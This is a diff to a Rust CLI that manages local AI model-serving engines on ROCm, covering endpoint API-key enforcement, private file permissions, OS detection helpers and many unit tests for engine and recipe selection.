-/// value-typed `LEMONADE_API_KEY` env var, but the Windows detached-spawn -/// primitive only carries path-valued env overrides, so the key never reaches it. -/// vLLM enforces auth on every platform (`VLLM_API_KEY`), and loopback binds -/// (`public_bind == false`) need no key — both pass. `is_windows` is a parameter -/// so both branches are unit-testable off-Windows. -fn ensure_public_bind_engine_supported( - engine: &str, - public_bind: bool, - is_windows: bool, -) -> Result<()> { - if public_bind && is_windows && engine == "lemonade" { - bail!( - "public binding with the lemonade engine is not supported on Windows: the endpoint \ - API key cannot be enforced there. Use `--engine vllm`, or bind a loopback host \ - (the default 127.0.0.1)." - ); - } - Ok(()) -} - -/// Refuse to (re)spawn a managed service recorded on a public host when its -/// endpoint API key is gone, so a respawn cannot reopen the endpoint anonymously. -/// -/// `serve()` applies the loopback-vs-public policy once, via -/// [`resolve_endpoint_auth`], and persists the resulting key. Every later spawn -/// — `rocm services restart`, and `rocmd`'s recovery supervisor — reads that key -/// file back and would otherwise treat "no key file" as "no auth wanted", -/// silently downgrading a protected public endpoint to an open one. The real -/// invariant is a property of the *host*, not of the file: a non-loopback bind -/// must always be authenticated. -/// -/// The gap is reachable through ordinary commands, because a stop deletes the -/// key file and `rocm services restart` accepts a stopped service id (its help -/// points at `rocm services list --all`). -/// -/// `key_present` is a plain `bool` rather than a path so both branches are -/// unit-testable without touching the filesystem, mirroring `is_windows` in -/// [`ensure_public_bind_engine_supported`]. -fn ensure_public_service_has_endpoint_key( - host: &str, - key_present: bool, - requires_api_key: bool, -) -> Result<()> { - // Two ways a service can need a key. A public bind is the obvious one. The - // other is a service that asked for auth on a loopback bind, because - // something outside this process republishes the port — a tailnet publish - // survives a reboot, let alone a restart, so "loopback" stops meaning - // "only this machine" and the bind address can no longer be trusted to - // answer the question on its own. - if requires_api_key && !key_present { - bail!( - "managed service was launched with `--require-api-key` but has no endpoint API key, \ - so restarting it would reopen it without authentication. Something outside this \ - machine may still be publishing its port. The key is dropped when a service stops \ - and cannot be recovered. Launch it again with \ - `rocm serve --require-api-key` (add `--api-key `, or set ROCM_SERVE_API_KEY, \ - to choose the key instead of generating one)." - ); - } - if rocm_engine_protocol::is_public_bind_host(host) && !key_present { - bail!( - "managed service is bound to the public host `{host}` but has no endpoint API key, \ - so restarting it would reopen it without authentication. The key is dropped when a \ - service stops and cannot be recovered. Launch it again with \ - `rocm serve --host {host} --allow-public-bind` (add `--api-key `, or set \ - ROCM_SERVE_API_KEY, to choose the key instead of generating one)." - ); - } - Ok(()) -} - -/// Write `contents` to `path` with owner-only (0600) permissions on Unix so a -/// secret is not world-readable. On non-Unix, default permissions apply. -pub(crate) fn write_private_file_0600(path: &Path, contents: &[u8]) -> Result<()> { - if let Some(parent) = path.parent() { - fs::create_dir_all(parent)?; - } - #[cfg(unix)] - { - use std::os::unix::fs::OpenOptionsExt as _; - let mut file = fs::OpenOptions::new() - .write(true) - .create(true) - .truncate(true) - .mode(0o600) - .open(path)?; - std::io::Write::write_all(&mut file, contents)?; - } - #[cfg(not(unix))] - { - fs::write(path, contents)?; - } - Ok(()) -} - -#[cfg(not(windows))] -fn detach_background_command(command: &mut ProcessCommand) { - rocm_core::detach_command_session(command); -} - -#[cfg(not(windows))] -fn attach_background_stdio(command: &mut ProcessCommand, log_path: Option<&Path>) -> Result<()> { - if let Some(log_path) = log_path { - let log = fs::OpenOptions::new() - .create(true) - .append(true) - .open(log_path) - .with_context(|| format!("failed to open {}", log_path.display()))?; - command - .stdout(Stdio::from(log.try_clone()?)) - .stderr(Stdio::from(log)); - } else { - command.stdout(Stdio::null()).stderr(Stdio::null()); - } - Ok(()) -} - -#[cfg(not(windows))] -fn managed_engine_startup_failure_detail(status: ExitStatus, log_path: &Path) -> String { - let mut recent_lines = read_optional_tail_lines(log_path, 80, "service log"); - if recent_lines.is_empty() { - for _ in 0..5 { - thread::sleep(Duration::from_millis(120)); - recent_lines = read_optional_tail_lines(log_path, 80, "service log"); - if !recent_lines.is_empty() { - break; - } - } - } - if recent_lines.is_empty() { - return format!( - "managed engine exited immediately with status {status}; inspect {}", - log_path.display() - ); - } - format!( - "managed engine exited immediately with status {status}; inspect {}\n\nrecent startup log output:\n{}", - log_path.display(), - recent_lines.join("\n") - ) -} -#[cfg(not(windows))] -fn managed_service_process_command(program: &Path, args: &[String]) -> ProcessCommand { - let mut command = ProcessCommand::new(program); - command.args(args); - command -} - -/// Engine-neutral result of a managed launch. Returned rather than printed so the -/// caller can render it either as the rich deployment summary (interactive TTY) or -/// as the plain line-by-line form (piped output, chat assistant), from one code path. -struct ManagedLaunchReport { - service_id: String, - /// `http://host:port/v1`. - endpoint_url: String, - /// `"ready"` (inference confirmed), `"running"` (model listed but not serving - /// yet), `"starting"` (endpoint not answering), or the existing service's - /// status when nothing was spawned. - status: String, - /// True when an equivalent service was already live and nothing was spawned. - already_running: bool, - child_pid: Option, - log_path: Option, - manifest_path: Option, -} - -/// Either an already-live service (nothing spawned) or a freshly spawned engine -/// child that is `running` but not yet HTTP-ready. -/// -/// Split out of [`start_managed_service`] so the attached (`--verbose` / -/// `--foreground`) serve path can spawn the very same detached child and stream -/// its log live from the first line — including startup — instead of blocking on -/// the readiness wait before any output appears. -enum ManagedSpawn { - AlreadyRunning(ManagedLaunchReport), - // `ManagedServiceRecord` is large; box it so the two variants stay a similar - // size (clippy::large_enum_variant). - Spawned { - record: Box, - child_pid: u32, - }, -} - -/// Spawn the detached engine child shared by the managed (background) and -/// attached (`--verbose`/`--foreground`) serve paths. Returns before the HTTP -/// readiness wait; callers decide whether to block on readiness -/// ([`start_managed_service`]) or start tailing the log immediately -/// ([`run_attached_service`]). -#[allow(clippy::too_many_arguments)] -fn spawn_managed_engine_child( - paths: &AppPaths, - engine: &str, - service_id: &str, - requested_model: &str, - resolve: &ResolveModelResponse, - host: &str, - port: u16, - device_policy: &DevicePolicy, - gpu_indices: &[u32], - runtime_id: Option<&str>, - env_id: Option<&str>, - engine_recipe: Option<&EngineRecipeHint>, - require_api_key: bool, -) -> Result { - paths.ensure()?; - fs::create_dir_all(paths.services_dir())?; - - // Idempotency guard: if a managed service for this engine+model is already - // alive, surface it and spawn nothing. A second `serve --managed` (e.g. the - // chat assistant re-issuing the same request) is treated as satisfied, not - // an error. Keyed on engine+canonical model — the freshly generated - // `service_id` is timestamp-unique and would never match an existing one. - // Stale/dead services fall through and relaunch normally. - let requested_recipe_json = engine_recipe - .map(serde_json::to_string) - .transpose() - .context("failed to encode engine recipe hint")?; - if let Some(existing) = - existing_live_managed_service(paths, engine, &resolve.canonical_model_id) - { - if existing.engine_recipe_json != requested_recipe_json { - bail!( - "managed service `{}` is already running for engine `{engine}` and model `{}` with different serve options (recipe hint, tool-call parser, or generation defaults); stop it and run `rocm serve` again to apply the requested options", - existing.service_id, - resolve.canonical_model_id + if existing.engine_recipe_json != requested_recipe_json { + bail!( + "managed service `{}` is already running for engine `{engine}` and model `{}` with different serve options (recipe hint, tool-call parser, or generation defaults); stop it and run `rocm serve` again to apply the requested options", + existing.service_id, + resolve.canonical_model_id ); } // Reuse cannot satisfy a demand for auth the running server never got. @@ -7477,6 +4256,13 @@ fn print_managed_launch_plain(report: &ManagedLaunchReport, endpoint_api_key: Op } println!(" endpoint: {}", report.endpoint_url); if let Some(key) = endpoint_api_key { + // Intentional one-time display of a freshly generated API key to the + // terminal so the user can copy it — the designed delivery channel + // documented on `render_endpoint_client_config`, not a log. The tag below + // is currently inert (Rust's CodeQL pack has no AlertSuppression.ql yet — + // github/codeql#21637) but will start working once that lands, since the + // tag must be the single line immediately before the flagged code. + // codeql[rust/cleartext-logging] print!( "{}", render_endpoint_client_config(&report.endpoint_url, key) @@ -7759,6 +4545,9 @@ fn run_attached_service( println!(" service_id: {service_id}"); println!(" endpoint: {endpoint}"); if let Some(key) = endpoint_api_key { + // Same intentional one-time key display as `print_managed_launch_plain` + // above; see its rationale for why the tag below is currently inert. + // codeql[rust/cleartext-logging] print!("{}", render_endpoint_client_config(&endpoint, key)); } println!(" streaming engine logs — Ctrl-D detaches (leaves it running), Ctrl-C stops it"); @@ -9848,13 +6637,7 @@ fn paths_equivalent(left: &Path, right: &Path) -> bool { rocm_core::runtime_paths_equivalent(&left, &right) } -fn path_is_same_or_inside(path: &Path, base: &Path) -> bool { - let path = normalize_path_for_compare(path); - let base = normalize_path_for_compare(base); - runtime_path_is_same_or_inside(&path, &base) -} - -fn normalize_path_for_compare(path: &Path) -> PathBuf { +pub(crate) fn normalize_path_for_compare(path: &Path) -> PathBuf { if let Ok(canonical) = path.canonicalize() { return canonical; } @@ -10007,6 +6790,46 @@ const fn system_package_install_action( } } +pub(crate) const fn empty_as_unknown(value: &str) -> &str { + if value.is_empty() { "" } else { value } +} + +pub(crate) fn parse_os_release_field(text: &str, key: &str) -> Option { + for line in text.lines() { + let Some((name, raw_value)) = line.split_once('=') else { + continue; + }; + if name != key { + continue; + } + return Some(raw_value.trim().trim_matches('"').to_owned()); + } + None +} + +pub(crate) fn read_os_release() -> Result { + fs::read_to_string("/etc/os-release").context("failed to read /etc/os-release") +} + +/// Run a command given as an argv vector directly, without going through a shell. +/// +/// Used for [`run_system_package_install_plan`], whose commands are modeled as +/// argv vectors so no shell quoting or `sudo`-prefix string handling is needed. +fn run_argv_with_stdin(argv: &[String], stdin: Stdio) -> Result<()> { + let (program, args) = argv + .split_first() + .context("install command has no program to run")?; + let status = ProcessCommand::new(program) + .args(args) + .stdin(stdin) + .status() + .with_context(|| format!("failed to launch `{}`", argv.join(" ")))?; + if !status.success() { + bail!("`{}` exited with {status}", argv.join(" ")); + } + Ok(()) +} + /// Ensure the OpenMPI runtime that vLLM requires is present before the vLLM wheel /// is installed. On Linux/WSL, when OpenMPI is missing, this installs it through /// the system package manager. @@ -16750,11 +13573,6 @@ fn plain_status_label(status: &str) -> String { status.replace('_', " ") } -pub(crate) fn render_engine_inventory_text() -> String { - let paths = AppPaths::discover().ok(); - render_engine_inventory_text_with_paths(paths.as_ref()) -} - /// Marker shown beside the engine `serve`/CLI commands default to. Every /// place that renders this glyph MUST use this constant so the rendered /// character and the legend text stay in sync. @@ -23001,7 +19819,7 @@ fn treat_as_natural_language(args: &[String]) -> bool { } #[cfg(test)] -mod tests { +pub(crate) mod tests { use std::cell::RefCell; use rocm_core::browser::Opener; @@ -23341,13 +20159,13 @@ mod tests { /// the mutation racing a read, not a name collision. Every test that touches /// env therefore holds this one process-wide lock, and each mutation is saved /// and restored on drop so it cannot leak into another test. - struct ScopedTestEnv { + pub(crate) struct ScopedTestEnv { _lock: std::sync::MutexGuard<'static, ()>, saved: Vec<(String, Option)>, } impl ScopedTestEnv { - fn new() -> Self { + pub(crate) fn new() -> Self { static LOCK: Mutex<()> = Mutex::new(()); let lock = LOCK .lock() @@ -23362,7 +20180,7 @@ mod tests { /// test, so a value exported in the developer's or runner's shell cannot /// leak into a plan and make its resolved `repo_version`/package release /// disagree with the assertion. - fn with_amd_overrides_cleared() -> Self { + pub(crate) fn with_amd_overrides_cleared() -> Self { let mut env = Self::new(); env.clear("ROCM_CLI_AMDGPU_VERSION"); env.clear("ROCM_CLI_AMDGPU_PACKAGE_RELEASE"); @@ -23376,7 +20194,7 @@ mod tests { } #[allow(unsafe_code)] // std::env::set_var is unsafe in edition 2024 - fn set(&mut self, key: &str, value: &str) { + pub(crate) fn set(&mut self, key: &str, value: &str) { self.save(key); unsafe { std::env::set_var(key, value); @@ -23384,7 +20202,7 @@ mod tests { } #[allow(unsafe_code)] // std::env::remove_var is unsafe in edition 2024 - fn clear(&mut self, key: &str) { + pub(crate) fn clear(&mut self, key: &str) { self.save(key); unsafe { std::env::remove_var(key); @@ -25016,50 +21834,6 @@ mod tests { Ok(()) } - fn test_examine(os: &str, wsl: bool) -> ExamineSummary { - ExamineSummary { - os: os.to_owned(), - arch: "x86_64".to_owned(), - kernel: Some("6.8.0-test".to_owned()), - distro: Some("test distro".to_owned()), - cpu: Some("AMD Ryzen".to_owned()), - system_ram_gib: Some(64.0), - interactive_terminal: false, - default_engine: "vllm".to_owned(), - detected_gfx_target: Some("gfx1201".to_owned()), - compatible_therock_family: Some("gfx120X-all".to_owned()), - detected_therock_family: None, - driver: rocm_core::DriverSummary { - policy: "linux_official_amd_dkms_wrapper".to_owned(), - status: "amdgpu_missing".to_owned(), - detail: Some("/dev/kfd missing".to_owned()), - }, - legacy_rocm: rocm_core::LegacyRocmSummary { - status: "not_detected".to_owned(), - paths: Vec::new(), - detail: None, - version: None, - }, - wsl: wsl.then_some(rocm_core::WslSummary { - is_wsl: true, - dxg_device: true, - dxcore: true, - librocdxg: false, - rocdxg_dids: false, - ldconfig_librocdxg: false, - rocminfo: false, - cargo: false, - detail: Some("missing librocdxg".to_owned()), - }), - managed_runtime_count: 0, - managed_service_count: 0, - model_cache_entries: 0, - config_dir: PathBuf::from("/tmp/config"), - data_dir: PathBuf::from("/tmp/data"), - cache_dir: PathBuf::from("/tmp/cache"), - } - } - fn test_app_paths() -> AppPaths { AppPaths { config_dir: PathBuf::from("C:/Users/test/.rocm"), @@ -25282,6 +22056,34 @@ mod tests { ); } + #[test] + fn hybrid_planner_lets_a_configured_engine_outrank_the_host_default() { + let config = RocmCliConfig { + default_engine: Some("lemonade".to_owned()), + ..RocmCliConfig::default() + }; + let plan = build_freeform_plan_with_recipes( + "serve some/unmatched-model", + &config, + Some(&[]), + "vllm", + ); + + let engine_arg = plan + .actions + .iter() + .find_map(|action| { + let index = action.args.iter().position(|arg| arg == "--engine")?; + action.args.get(index + 1).cloned() + }) + .expect("the generated serve command must name an engine"); + assert_eq!( + engine_arg, "lemonade", + "an engine the user configured must still win:\n{:?}", + plan.actions + ); + } + #[test] fn hybrid_planner_bakes_the_host_engine_into_the_generated_serve_command() { // The generated command carries an explicit `--engine`, which outranks @@ -25316,34 +22118,6 @@ mod tests { ); } - #[test] - fn hybrid_planner_lets_a_configured_engine_outrank_the_host_default() { - let config = RocmCliConfig { - default_engine: Some("lemonade".to_owned()), - ..RocmCliConfig::default() - }; - let plan = build_freeform_plan_with_recipes( - "serve some/unmatched-model", - &config, - Some(&[]), - "vllm", - ); - - let engine_arg = plan - .actions - .iter() - .find_map(|action| { - let index = action.args.iter().position(|arg| arg == "--engine")?; - action.args.get(index + 1).cloned() - }) - .expect("the generated serve command must name an engine"); - assert_eq!( - engine_arg, "lemonade", - "an engine the user configured must still win:\n{:?}", - plan.actions - ); - } - #[test] fn hybrid_planner_defaults_generic_local_assistant_to_validated_qwen() { let plan = build_freeform_plan_with_recipes( @@ -31573,117 +28347,16 @@ install therock"; #[test] fn endpoint_client_config_shows_key_once_with_bearer_guidance() { let rendered = render_endpoint_client_config("http://0.0.0.0:11435/v1", "secret-123"); + // Dummy literal exercising the intentional one-time key display documented + // on `render_endpoint_client_config`; not a real credential or a log write. + // codeql[rust/cleartext-logging] assert!(rendered.contains("secret-123"), "{rendered}"); + // codeql[rust/cleartext-logging]: see rationale above. assert!(rendered.contains("Authorization: Bearer"), "{rendered}"); + // codeql[rust/cleartext-logging]: see rationale above. assert!(rendered.contains("shown only now"), "{rendered}"); } - #[test] - fn serve_engine_selection_uses_shared_recipe_when_no_override_exists() { - let recipe = resolve_builtin_model_recipe("qwen32b").expect("qwen32b recipe"); - - let selection = select_serve_engine(None, None, Some(&recipe), None); - - assert_eq!( - selection, - ServeEngineSelection { - engine: "vllm".to_owned(), - source: "recipe preferred engine; pass --engine to override; no automatic fallback", - } - ); - assert_eq!( - serve_engine_selection_line(&selection), - " engine_selection: recipe preferred engine; pass --engine to override; no automatic fallback" - ); - assert_eq!( - serve_model_ref_for_engine("qwen32b", Some(&recipe), "vllm"), - "Qwen/Qwen3-32B-FP8" - ); - } - - #[test] - fn serve_engine_selection_prefers_vllm_for_supported_gpus() { - let summary = rocm_core::HostGpuSummary { - therock_family: Some("gfx90a".to_owned()), - ..rocm_core::HostGpuSummary::default() - }; - - let selection = select_serve_engine(None, None, None, Some(&summary)); - - // vLLM is unsupported on native Windows, so the GPU-family preference is gated - // off there and selection falls back to the platform default. - let expected = if cfg!(windows) { - ServeEngineSelection { - engine: "lemonade".to_owned(), - source: "platform default", - } - } else { - ServeEngineSelection { - engine: "vllm".to_owned(), - source: "detected ROCm GPU family prefers vLLM", - } - }; - assert_eq!(selection, expected); - } - - #[test] - fn serve_engine_selection_keeps_recipe_engine_when_gpu_preference_is_incompatible() { - // qwen-smoke is a tiny GGUF model that only Lemonade can serve and has no vLLM - // recipe. Even on a vLLM-preferred GPU it must stay on Lemonade rather than being - // forced onto vLLM (which cannot load the GGUF and fails to locate the model). - let recipe = resolve_builtin_model_recipe("qwen-smoke").expect("qwen-smoke recipe"); - let summary = rocm_core::HostGpuSummary { - therock_family: Some("gfx90a".to_owned()), - ..rocm_core::HostGpuSummary::default() - }; - - let selection = select_serve_engine(None, None, Some(&recipe), Some(&summary)); - - assert_eq!( - selection, - ServeEngineSelection { - engine: "lemonade".to_owned(), - source: "recipe preferred engine; pass --engine to override; no automatic fallback", - } - ); - } - - #[test] - fn serve_qwen_uses_vllm_with_hf_repo_on_vllm_preferred_gpu() { - // The qwen alias serves the GGUF via Lemonade by default, but on a vLLM-preferred - // GPU it must serve the non-GGUF Hugging Face repo through vLLM. - let recipe = resolve_builtin_model_recipe("qwen").expect("qwen recipe"); - let summary = rocm_core::HostGpuSummary { - therock_family: Some("gfx94X-dcgpu".to_owned()), - ..rocm_core::HostGpuSummary::default() - }; - - let selection = select_serve_engine(None, None, Some(&recipe), Some(&summary)); - // On native Windows the vLLM preference is gated off, so the qwen recipe stays on - // its own preferred engine (Lemonade) instead of being routed to vLLM. - let expected = if cfg!(windows) { - ServeEngineSelection { - engine: "lemonade".to_owned(), - source: "recipe preferred engine; pass --engine to override; no automatic fallback", - } - } else { - ServeEngineSelection { - engine: "vllm".to_owned(), - source: "detected ROCm GPU family prefers vLLM", - } - }; - assert_eq!(selection, expected); - assert_eq!( - serve_model_ref_for_engine("qwen", Some(&recipe), "vllm"), - "Qwen/Qwen3-4B-Instruct-2507" - ); - // Lemonade keeps the GGUF canonical id. - assert_eq!( - serve_model_ref_for_engine("qwen", Some(&recipe), "lemonade"), - "Qwen3-4B-Instruct-2507-GGUF" - ); - } - #[test] fn sdk_install_auto_engine_selection_prefers_vllm_for_supported_families() { // vLLM is unsupported on native Windows, so the SDK family preference is gated @@ -31694,329 +28367,6 @@ install therock"; assert_eq!(preferred_engine_for_sdk_family("gfx120X-all"), None); } - #[test] - fn explicit_engine_override_keeps_alias_when_shared_recipe_is_for_another_engine() { - // `qwen-smoke` is a Lemonade-only GGUF recipe (no vLLM engine recipe). - let recipe = resolve_builtin_model_recipe("qwen-smoke").expect("qwen-smoke recipe"); - - // Served under the engine it targets, the alias resolves to the canonical id. - assert_eq!( - serve_model_ref_for_engine("qwen-smoke", Some(&recipe), "lemonade"), - "Qwen3-0.6B-GGUF" - ); - // Under an engine the recipe does not support, the raw alias flows through unchanged. - assert_eq!( - serve_model_ref_for_engine("qwen-smoke", Some(&recipe), "vllm"), - "qwen-smoke" - ); - } - - #[test] - fn serve_engine_selection_respects_explicit_and_configured_engines() { - let recipe = resolve_builtin_model_recipe("qwen32b").expect("qwen32b recipe"); - - let explicit = select_serve_engine(Some("vllm"), Some("lemonade"), Some(&recipe), None); - let configured = select_serve_engine(None, Some("lemonade"), Some(&recipe), None); - - assert_eq!( - explicit, - ServeEngineSelection { - engine: "vllm".to_owned(), - source: "explicit --engine", - } - ); - assert_eq!( - configured, - ServeEngineSelection { - engine: "lemonade".to_owned(), - source: "configured default_engine", - } - ); - } - - #[test] - fn protocol_engine_recipe_hint_maps_selected_engine_metadata() { - let mut recipe = resolve_builtin_model_recipe("qwen").expect("qwen recipe"); - recipe.engine_recipes = vec![ - rocm_core::ModelRecipeEngineRecord { - engine: "vllm".to_owned(), - required_flags: vec!["--enable-auto-tool-choice".to_owned()], - parser_settings: BTreeMap::from([( - "reasoning_parser".to_owned(), - "qwen3".to_owned(), - )]), - preferred_endpoint: Some(rocm_core::ModelRecipeEndpointRecord { - endpoint_mode: "openai".to_owned(), - settings: BTreeMap::from([("streaming".to_owned(), "true".to_owned())]), - }), - unsupported_combinations: vec![ - rocm_core::ModelRecipeUnsupportedCombinationRecord { - combination: "native Windows GPU serving".to_owned(), - reason: "vLLM ROCm serving is Linux/WSL only".to_owned(), - }, - ], - notes: vec!["adapter hint".to_owned()], - model_id_override: None, - }, - rocm_core::ModelRecipeEngineRecord { - engine: "lemonade".to_owned(), - required_flags: vec!["--reasoning-parser".to_owned(), "qwen3".to_owned()], - parser_settings: BTreeMap::new(), - preferred_endpoint: None, - unsupported_combinations: Vec::new(), - notes: Vec::new(), - model_id_override: None, - }, - ]; - - let hint = protocol_engine_recipe_hint(&recipe, "vllm").expect("vllm hint"); - - assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); - assert_eq!(hint.engine, "vllm"); - assert_eq!( - hint.required_flags, - vec!["--enable-auto-tool-choice".to_owned()] - ); - assert_eq!( - hint.parser_settings - .get("reasoning_parser") - .map(String::as_str), - Some("qwen3") - ); - assert_eq!( - hint.preferred_endpoint - .as_ref() - .map(|endpoint| endpoint.endpoint_mode.as_str()), - Some("openai") - ); - assert_eq!( - hint.preferred_endpoint - .as_ref() - .and_then(|endpoint| endpoint.settings.get("streaming")) - .map(String::as_str), - Some("true") - ); - assert_eq!(hint.unsupported_combinations.len(), 1); - assert_eq!(hint.notes, vec!["adapter hint".to_owned()]); - let serve_lines = render_serve_engine_recipe_lines(&hint); - assert!(serve_lines.contains( - "engine_recipe_policy: selected-engine required_flags are applied at launch" - )); - assert!(serve_lines.contains("engine_recipe_required_flags: --enable-auto-tool-choice")); - assert!(protocol_engine_recipe_hint(&recipe, "unknown-engine").is_none()); - } - - #[test] - fn tool_call_override_synthesizes_hint_for_vllm_without_recipe() { - // Arbitrary HF repo with no catalog recipe: the explicit override is the - // only source of the parser, and a minimal hint is synthesized to carry it. - let hint = engine_recipe_with_tool_call_override("vllm", None, Some("hermes")) - .expect("an override should synthesize a vllm tool-choice hint"); - assert_eq!(hint.engine, "vllm"); - assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); - assert_eq!( - hint.required_flags, - vec![ - "--enable-auto-tool-choice".to_owned(), - "--tool-call-parser".to_owned(), - "hermes".to_owned(), - ] - ); - } - - #[test] - fn tool_call_override_replaces_recipe_authored_parser() { - // Override wins over an authored parser: exactly one `--tool-call-parser`, - // set to the override value, with unrelated flags preserved in order. - let existing = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec![ - "--reasoning-parser".to_owned(), - "qwen3".to_owned(), - "--enable-auto-tool-choice".to_owned(), - "--tool-call-parser".to_owned(), - "llama3_json".to_owned(), - ], - ..EngineRecipeHint::default() - }; - let hint = - engine_recipe_with_tool_call_override("vllm", Some(existing), Some("hermes")).unwrap(); - assert_eq!( - hint.required_flags, - vec![ - "--reasoning-parser".to_owned(), - "qwen3".to_owned(), - "--enable-auto-tool-choice".to_owned(), - "--tool-call-parser".to_owned(), - "hermes".to_owned(), - ] - ); - assert_eq!( - hint.required_flags - .iter() - .filter(|flag| *flag == "--tool-call-parser") - .count(), - 1 - ); - } - - #[test] - fn tool_call_override_absent_preserves_recipe_flags_without_guessing() { - // No override: authored recipe metadata flows through unchanged and no - // parser is ever guessed from the model ref. - let authored = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec![ - "--enable-auto-tool-choice".to_owned(), - "--tool-call-parser".to_owned(), - "hermes".to_owned(), - ], - ..EngineRecipeHint::default() - }; - let hint = - engine_recipe_with_tool_call_override("vllm", Some(authored.clone()), None).unwrap(); - assert_eq!(hint.required_flags, authored.required_flags); - - // Unknown model, no recipe, no override: nothing is injected. - assert!(engine_recipe_with_tool_call_override("vllm", None, None).is_none()); - // A blank override is treated as absent. - assert!(engine_recipe_with_tool_call_override("vllm", None, Some(" ")).is_none()); - } - - #[test] - fn tool_call_override_leaves_non_vllm_engines_untouched() { - // The override is vLLM-specific: other engines are never rewritten. - assert!(engine_recipe_with_tool_call_override("lemonade", None, Some("hermes")).is_none()); - let existing = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "lemonade".to_owned(), - required_flags: vec!["--some-flag".to_owned()], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_tool_call_override( - "lemonade", - Some(existing.clone()), - Some("hermes"), - ) - .unwrap(); - assert_eq!(hint.required_flags, existing.required_flags); - } - - #[test] - fn gpu_memory_utilization_absent_without_explicit_flag() { - // rocm-cli ships no default: with nothing supplied the recipe is left - // alone, so vLLM applies its own default rather than one rocm-cli owns. - assert_eq!(parse_gpu_memory_utilization(None).unwrap(), None); - assert!(engine_recipe_with_gpu_memory_utilization_override("vllm", None, None).is_none()); - let authored = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec!["--enable-auto-tool-choice".to_owned()], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_gpu_memory_utilization_override("vllm", Some(authored), None) - .unwrap(); - assert!( - !hint - .required_flags - .iter() - .any(|flag| flag == "--gpu-memory-utilization"), - "no default may be injected: {:?}", - hint.required_flags - ); - } - - #[test] - fn gpu_memory_utilization_override_reaches_required_flags() { - let value = parse_gpu_memory_utilization(Some("0.35")).unwrap(); - let hint = engine_recipe_with_gpu_memory_utilization_override("vllm", None, value) - .expect("an explicit value should synthesize a vllm hint"); - assert_eq!(hint.engine, "vllm"); - assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); - assert_eq!( - hint.required_flags, - vec!["--gpu-memory-utilization".to_owned(), "0.35".to_owned()] - ); - } - - #[test] - fn gpu_memory_utilization_override_replaces_authored_value_and_keeps_others() { - let existing = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec![ - "--enable-auto-tool-choice".to_owned(), - "--gpu-memory-utilization".to_owned(), - "0.8".to_owned(), - "--tool-call-parser".to_owned(), - "hermes".to_owned(), - ], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_gpu_memory_utilization_override( - "vllm", - Some(existing), - parse_gpu_memory_utilization(Some("1.0")).unwrap(), - ) - .unwrap(); - assert_eq!( - hint.required_flags, - vec![ - "--enable-auto-tool-choice".to_owned(), - "--tool-call-parser".to_owned(), - "hermes".to_owned(), - "--gpu-memory-utilization".to_owned(), - "1".to_owned(), - ] - ); - } - - #[test] - fn gpu_memory_utilization_override_leaves_non_vllm_engines_untouched() { - // The override is vLLM-specific: other engines are never rewritten, with - // or without a recipe of their own. - assert!( - engine_recipe_with_gpu_memory_utilization_override("lemonade", None, Some(0.5)) - .is_none() - ); - let existing = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "lemonade".to_owned(), - required_flags: vec!["--some-flag".to_owned()], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_gpu_memory_utilization_override( - "lemonade", - Some(existing.clone()), - Some(0.5), - ) - .unwrap(); - assert_eq!(hint.required_flags, existing.required_flags); - } - - #[test] - fn gpu_memory_utilization_rejects_out_of_range_and_unparsable_values() { - // An explicit CLI value is never silently ignored (unlike the env-var - // overrides elsewhere): each bad value must produce an actionable error. - for bad in ["0", "0.0", "1.5", "-0.2", "abc", "", "NaN", "inf"] { - let Err(error) = parse_gpu_memory_utilization(Some(bad)) else { - panic!("`{bad}` must be rejected, not silently ignored"); - }; - let message = error.to_string(); - assert!( - message.contains("--gpu-memory-utilization"), - "error for `{bad}` should name the flag: {message}" - ); - } - assert_eq!( - parse_gpu_memory_utilization(Some(" 0.5 ")).unwrap(), - Some(0.5) - ); - assert_eq!(parse_gpu_memory_utilization(Some("1")).unwrap(), Some(1.0)); - } - #[test] fn serve_notes_surface_the_ignored_engine_flag_in_summary_mode() { // The interactive summary is what a default `rocm serve` prints, so a flag @@ -32045,181 +28395,14 @@ install therock"; &[0], None, None, - None, - false, - ); - assert!( - !quiet - .iter() - .any(|entry| entry.contains("--gpu-memory-utilization")), - "nothing to report when the flag was honored: {quiet:?}" - ); - } - - #[test] - fn generation_defaults_inject_override_generation_config_for_vllm() { - // vLLM has no raw sampling flags: all three controls collapse into a single - // `--override-generation-config` JSON with `--max-tokens` mapped to the - // engine's `max_new_tokens` output cap. - let hint = engine_recipe_with_generation_defaults( - "vllm", - None, - ServeGenerationDefaults { - temperature: Some(0.5), - top_p: Some(0.25), - max_tokens: Some(128), - }, - ) - .expect("vllm defaults are supported") - .expect("supplied defaults should synthesize a vllm hint"); - assert_eq!(hint.engine, "vllm"); - assert_eq!(hint.required_flags.len(), 2); - assert_eq!(hint.required_flags[0], "--override-generation-config"); - let config: serde_json::Value = - serde_json::from_str(&hint.required_flags[1]).expect("config is valid JSON"); - assert_eq!(config["temperature"], 0.5); - assert_eq!(config["top_p"], 0.25); - assert_eq!(config["max_new_tokens"], 128); - } - - #[test] - fn generation_defaults_include_only_supplied_values() { - // Unset controls are omitted so the engine keeps its own defaults. - let hint = engine_recipe_with_generation_defaults( - "vllm", - None, - ServeGenerationDefaults { - temperature: Some(0.25), - top_p: None, - max_tokens: None, - }, - ) - .expect("vllm defaults are supported") - .expect("a single supplied default still synthesizes a hint"); - let config: serde_json::Value = - serde_json::from_str(&hint.required_flags[1]).expect("config is valid JSON"); - assert_eq!(config["temperature"], 0.25); - assert!(config.get("top_p").is_none()); - 